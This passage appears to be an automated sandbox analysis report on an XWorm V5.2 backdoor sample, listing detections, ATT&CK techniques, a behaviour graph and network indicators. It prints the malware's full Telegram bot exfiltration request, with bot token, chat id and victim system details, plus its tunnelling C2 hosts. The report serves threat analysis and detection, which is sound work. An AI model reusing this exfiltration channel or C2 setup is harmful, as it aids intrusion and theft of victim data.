                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: X.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.X.exe.1f0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.2058996703.00000000001F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: X.exe PID: 7096, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Svchost.exe, type: DROPPED

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: X.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.X.exe.1f0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.2058996703.00000000001F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: X.exe PID: 7096, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Svchost.exe, type: DROPPED
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Windows Management Instrumentation
                  1
                  Scheduled Task/Job
                  11
                  Process Injection
                  11
                  Masquerading
                  OS Credential Dumping1
                  Query Registry
                  Remote Services11
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job
                  21
                  Registry Run Keys / Startup Folder
                  1
                  Scheduled Task/Job
                  1
                  Disable or Modify Tools
                  LSASS Memory231
                  Security Software Discovery
                  Remote Desktop ProtocolData from Removable Media11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  DLL Side-Loading
                  21
                  Registry Run Keys / Startup Folder
                  141
                  Virtualization/Sandbox Evasion
                  Security Account Manager1
                  Process Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                  DLL Side-Loading
                  11
                  Process Injection
                  NTDS141
                  Virtualization/Sandbox Evasion
                  Distributed Component Object ModelInput Capture1
                  Ingress Tool Transfer
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Deobfuscate/Decode Files or Information
                  LSA Secrets1
                  Application Window Discovery
                  SSHKeylogging2
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                  Software Packing
                  Cached Domain Credentials1
                  File and Directory Discovery
                  VNCGUI Input Capture13
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading
                  DCSync13
                  System Information Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1387988 Sample: X.exe Startdate: 07/02/2024 Architecture: WINDOWS Score: 100 29 api.telegram.org 2->29 31 trusting-smoke-90361.pktriot.net 2->31 33 eu-central-7075.packetriot.net 2->33 39 Snort IDS alert for network traffic 2->39 41 Multi AV Scanner detection for domain / URL 2->41 43 Found malware configuration 2->43 47 14 other signatures 2->47 8 X.exe 15 5 2->8         started        13 Svchost.exe 1 2->13         started        15 svchost.exe 8 2->15         started        17 7 other processes 2->17 signatures3 45 Uses the Telegram API (likely for C&C communication) 29->45 process4 dnsIp5 35 eu-central-7075.packetriot.net 167.71.56.116, 22100, 49700, 49701 DIGITALOCEAN-ASNUS United States 8->35 37 api.telegram.org 149.154.167.220, 443, 49699 TELEGRAMRU United Kingdom 8->37 27 C:\Users\user\AppData\Local\...\Svchost.exe, PE32 8->27 dropped 49 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->49 51 Uses schtasks.exe or at.exe to add and modify task schedules 8->51 53 Drops PE files with benign system names 8->53 19 schtasks.exe 1 8->19         started        21 WerFault.exe 19 16 8->21         started        55 Antivirus detection for dropped file 13->55 57 Multi AV Scanner detection for dropped file 13->57 59 Machine Learning detection for dropped file 13->59 23 WerFault.exe 2 15->23         started        file6 signatures7 process8 process9 25 conhost.exe 19->25         started       

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  X.exe82%ReversingLabsByteCode-MSIL.Backdoor.XWorm
                  X.exe79%VirustotalBrowse
                  X.exe100%AviraHEUR/AGEN.1305769
                  X.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\Svchost.exe100%AviraHEUR/AGEN.1305769
                  C:\Users\user\AppData\Local\Temp\Svchost.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\Svchost.exe82%ReversingLabsByteCode-MSIL.Backdoor.XWorm
                  C:\Users\user\AppData\Local\Temp\Svchost.exe79%VirustotalBrowse
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  eu-central-7075.packetriot.net13%VirustotalBrowse
                  trusting-smoke-90361.pktriot.net1%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://schemas.mi0%URL Reputationsafe
                  http://www.w3.g/2000/09/xmldsig#&quot;&gt;&l0%Avira URL Cloudsafe
                  http://Passport.NET/STS0%Avira URL Cloudsafe
                  http://Passport.NET/tb_0%Avira URL Cloudsafe
                  http://Passport.NET/tbpose0%Avira URL Cloudsafe
                  http://Passport.NET/tb0%Avira URL Cloudsafe
                  http://crl.ver)0%Avira URL Cloudsafe
                  https://login.ecur0%Avira URL Cloudsafe
                  http://Passport.NET/tb0%VirustotalBrowse
                  http://Passport.NET/STS0%VirustotalBrowse
                  trusting-smoke-90361.pktriot.net0%Avira URL Cloudsafe
                  http://Passport.NET/tb_0%VirustotalBrowse
                  trusting-smoke-90361.pktriot.net1%VirustotalBrowse
                  http://Passport.NET/tbpose0%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    eu-central-7075.packetriot.net
                    167.71.56.116
                    truetrueunknown
                    trusting-smoke-90361.pktriot.net
                    unknown
                    unknowntrueunknown
                    NameMaliciousAntivirus DetectionReputation
                    https://api.telegram.org/bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE9633C7A2F2B74FB9C2E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%208ZZ4CZYT%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2false
                      high
                      trusting-smoke-90361.pktriot.nettrue
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd=svchost.exe, 00000012.00000003.4039112538.00000152D0955000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://schemas.misvchost.exe, 00000012.00000002.4521505766.00000152D090F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046392383.00000152D0907000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046671128.00000152D090E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://api.telegram.org/botX.exe, Svchost.exe.0.drfalse
                          high
                          http://schemas.xmlsoap.org/ws/2004/09/policy=80601svchost.exe, 00000012.00000002.4521622170.00000152D096F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046796242.00000152D096E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046462354.00000152D096D000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdtp:svchost.exe, 00000012.00000003.4031942080.00000152D0953000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSIDsvchost.exe, 00000012.00000003.4013536862.00000152D0910000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 00000012.00000003.4013536862.00000152D0910000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdGntIGGemsvchost.exe, 00000012.00000003.4039112538.00000152D0955000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdcurityTokenRsvchost.exe, 00000012.00000003.4039112538.00000152D0955000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 00000012.00000002.4521525759.00000152D0913000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4031991419.00000152D0E52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521577838.00000152D095F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4056518662.00000152D0966000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521550829.00000152D0937000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdxHwM5gsvchost.exe, 00000012.00000003.4046392383.00000152D0907000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046671128.00000152D090E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds.xmsvchost.exe, 00000012.00000003.4031443608.00000152D0954000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://login.microsoftonline.com/ppsecure/ResolveUser.srfsvchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://Passport.NET/STSsvchost.exe, 00000012.00000003.4039552321.00000152D0976000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/Issue.srfsvchost.exe, 00000012.00000002.4521622170.00000152D096F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046796242.00000152D096E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046462354.00000152D096D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAsvchost.exe, 00000012.00000003.4032113255.00000152D090E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521505766.00000152D090F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046392383.00000152D0907000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046671128.00000152D090E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://Passport.NET/tbposesvchost.exe, 00000012.00000002.4521911037.00000152D0E5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • 0%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.w3.svchost.exe, 00000012.00000002.4521937878.00000152D0E6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 00000012.00000002.4521622170.00000152D096F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046796242.00000152D096E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046462354.00000152D096D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdchemsvchost.exe, 00000012.00000003.4046777825.00000152D0953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046596064.00000152D0952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://login.microsoftonline.com/ppsecure/devicechangecredential.srfsvchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://Passport.NET/tbsvchost.exe, 00000012.00000003.4032063230.00000152D0956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4039552321.00000152D0976000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4032063230.00000152D095A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • 0%, Virustotal, Browse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 00000012.00000003.4031443608.00000152D0956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046392383.00000152D0907000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046412666.00000152D0955000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046617502.00000152D095C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdecurisvchost.exe, 00000012.00000003.4031962381.00000152D095D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4031443608.00000152D0956000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameX.exe, 00000000.00000002.4055350482.0000000002561000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMMsvchost.exe, 00000012.00000003.4013867750.00000152D0927000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200svchost.exe, 00000012.00000003.4031942080.00000152D0953000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsis-2svchost.exe, 00000012.00000003.4046777825.00000152D0953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046596064.00000152D0952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://signup.live.com/signup.aspxsvchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://Passport.NET/tb_svchost.exe, 00000012.00000002.4521120511.00000152D0081000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521959377.00000152D0E71000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046279655.00000152D0E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • 0%, Virustotal, Browse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd2BQpw43/HKsvchost.exe, 00000012.00000003.4039112538.00000152D0955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4014124615.00000152D0956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdema#1svchost.exe, 00000012.00000003.4031942080.00000152D0953000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.w3.g/2000/09/xmldsig#&quot;&gt;&lsvchost.exe, 00000012.00000003.4031910850.00000152D0E6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 00000012.00000002.4521525759.00000152D0913000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4031991419.00000152D0E52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4056518662.00000152D0966000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521550829.00000152D0937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
